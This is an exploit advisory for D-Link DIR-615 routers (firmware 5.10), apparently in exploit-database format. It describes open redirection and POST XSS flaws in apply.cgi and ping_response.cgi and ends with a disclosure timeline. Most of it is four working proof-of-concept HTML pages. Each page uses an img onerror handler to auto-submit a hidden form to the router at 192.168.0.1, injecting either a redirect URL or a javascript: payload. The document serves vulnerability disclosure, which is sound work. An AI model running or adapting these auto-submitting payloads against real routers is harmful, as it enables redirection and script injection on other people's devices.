83 lines
No EOL
2.8 KiB
Text
83 lines
No EOL
2.8 KiB
Text
# Title: D-Link DIR-615 Multiple Vulnerabilities
|
|
# Date: 10-01-2017
|
|
# Hardware Version: E3
|
|
# Firmware Version: 5.10
|
|
# Tested on: Windows 8 64-bit
|
|
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
|
|
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
|
|
|
|
Overview
|
|
--------
|
|
|
|
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
|
|
|
|
Open Redirection
|
|
-----------------
|
|
# apply.cgi
|
|
|
|
<html>
|
|
<!-- @OsandaMalith -->
|
|
<body>
|
|
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
|
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
|
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
|
<img src=x onerror="exploit.submit()"/>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
# ping_response.cgi
|
|
|
|
<html>
|
|
<!-- @OsandaMalith -->
|
|
<body>
|
|
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
|
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
|
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
|
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
|
|
<input type="hidden" name="ping" value="Ping" />
|
|
<img src=x onerror="exploit.submit()"/>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
POST XSS
|
|
---------
|
|
|
|
# apply.cgi
|
|
|
|
<html>
|
|
<!-- @OsandaMalith -->
|
|
<body>
|
|
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
|
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
|
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
|
<img src=x onerror="exploit.submit()"/>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
# ping_response.cgi
|
|
|
|
<html>
|
|
<!-- @OsandaMalith -->
|
|
<body>
|
|
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
|
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
|
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
|
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
|
|
<input type="hidden" name="ping" value="Ping" />
|
|
<img src=x onerror="exploit.submit()"/>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
Disclosure Timeline
|
|
--------------------
|
|
|
|
12/19/16: Reported to D-Link
|
|
12/21/16: Security Patch released
|
|
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf |